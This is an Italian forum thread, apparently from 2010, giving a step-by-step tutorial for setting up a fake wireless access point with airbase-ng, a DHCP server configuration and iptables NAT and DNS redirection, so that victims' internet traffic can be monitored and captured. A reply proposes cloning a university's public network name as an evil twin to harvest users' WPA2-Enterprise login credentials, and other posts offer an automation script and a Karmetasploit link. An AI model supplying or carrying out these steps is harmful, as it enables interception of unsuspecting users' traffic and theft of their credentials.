Come Creare un Access Point.

Started by ghostdog, December 18, 2010, 03:39:34 AM

Previous topic - Next topic

ghostdog

NB, questo tutorial se usato come trappola per ignari o' per queache scopo malefico, e' considerato " CRIMINE".

Ciao tutti
Vi faccio vedere come si fa' un Access Point con internet attivato.

Dimostrazione:

i passi sono:
* configurare il dhcpd.conf
*iniziare il AP falso con airbase-ng
*configurare IP tables per avere internet
*monitorare e catturare il traffico internet.

i tools necessarii:
> Backbox Linux
> scheda wifi esterna (usb)per creare una connessione internet su wlan1
e un getaway 192.168.1.1
> wireless card interna nel mio laptop che usero come AP falso. wlan0


Prima bisogna configurare il dhcpd.conf file.

Apri la console e scrivi:

nano /etc/dhcp3/dhcpd.conf ( ENTER )

*** copia il seguente nella console:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}


*** Premi Ctrl + X ---> Y --> ENTER per salvare il tutto.

*** Ora per iniziare il AP falso con airbase-ng devi mettere la tua carta in monitor ( ricordati ,questa e' la tua carta interna wlan0)

airmon-ng
airmon-ng start wlan0
airbase-ng -e "GHOSTDOG" -c 9 mon0


** Questo crera' una interface ( ath0 ) non criptata sul canale 9 che chiamero' GHOSTDOG ( tu chiamala quello che vuoi).

*** ora apri la console e scrivi:

airbase-ng -e "GHOSTDOG" -c 9 mon0

*** il sistema rispondera':
20:54:01 Create tap interface ath0
20:54:01 Trying to set MTU on ath0 to 1500
20:54:01 Trying to set MTU on mon0 to 1800
20:54:01 Access Point with BSSID 00:242:A1:40:8E started


*** adesso deve assegnare un subnet e un getaway;
apri la console e scrivi:

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129


*** Ora devi comiciare il DHCP, nella stessa console scrivi:

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

*** adesso devi creare gli IP tables per filtrare il traffico su ath0 verso internet. ( la tua wireless card wlan1 deve essere connessa a internet)
*** apri la console e scrivi:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1


@@@@@@@@@ Complimenti, ora hai generate un AP falso che chiunque potrebbe connettersi a te e avere internet @@@@@@@@@@@@@@@@@@@@@

Happy Hacking

GD

misfotto

good :) all'università è parecchio divertente farlo :)

al di là dei vari disclaimer sulla "criminosità" dell'atto, si potrebbe pensare anche ad un modo per rendere automatico, una volta attivata la rete wireless ( che in questo caso può anche non uscire su internet, abbattendo il "problema della seconda scheda wifi" ) la cattura delle credenziali degli utenti che provano a loggarsi.

per fare un esempio

creo una rete con lo stesso essid di una rete già esistente, ma su un canale diverso, mettiamo conto, una rete pubblica:

- RETE_PUBBLICA_1 ( channel: 1 ) ( la vera rete )

noi creiamo

- RETE_PUBBLICA_1 ( channel: 6 / 11 ) ( la nostra rete )

e salviamo tutte le credenziali con cui provano a connettersi gli utenti a quella rete. Questo potrebbe essere utile in scenari come quello della mia università, dove essendoci WPA2Enterprise-TKIP con autenticazione su server RADIUS, avoja a sniffare :P si fa prima con questo metodo, sicuramente un pò subdolo, ma parecchio efficace.

ti va se ci facciamo uno script insieme ? :)

ghostdog

Ciao

Si certamente si puoi fare uno script che automatizza il tutto, anche se basta copiare la guida su un Documento e poi quando serve, basta fare copy and paste nel terminal.
E' sicuramente un ottimo modo per scoprire la WPA del access point clonato.
Fammi saper, io posso scarabocchiare qualcosa poi te la passo se vuoi.

GD

greyfox

Io adesso ho buttato giù un piccolo script in python che automatizza la procedura di ghostdog, unica cosa non ho wi-fi a casa e quindi non posso testarlo =(

ghostdog se ti passo lo script puoi dirmi se funzione?

Greyfox

ghostdog

ciao, certo passamela, mi farebbe piacere testarla........

greyfox

Ecco qua..
è molto grezzo ancora come script, l'ho fatto al volo...
volevo solo vedere se funzionava dato che potrebbe entrare a far parte di un progettino leggermente più grande...
fammi sapere.

http://pastebin.com/4zgNpKd8

raffaele

#6
Segnalo questo tutorial:
http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit

Se qualcuno si prende la briga di testare il tutto su BackBox inseriremo howto e video sul sito.
raffaele@backbox:~$ Get root or die tryin'

ghostdog

#7
 :-\

Ciao, funziona tutto fino ad un certo punto mi dice che : dhcpd : unknown command !!!
a quanto pare ubuntu 10.04 utiltzza " Dhcp3" o almeno questo mi ha apparso nel repository, ho cercato di usarlo ma non va' bene, continuero' a testare !! ci deve essere un work around !! :-\

error :     Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Can't open /etc/dhcp3/dhcpd/dhcpd.conf: No such file or directory

*** Ragazzi, se conoscete un workaround, perfavore mettetelo nel forum, grazie***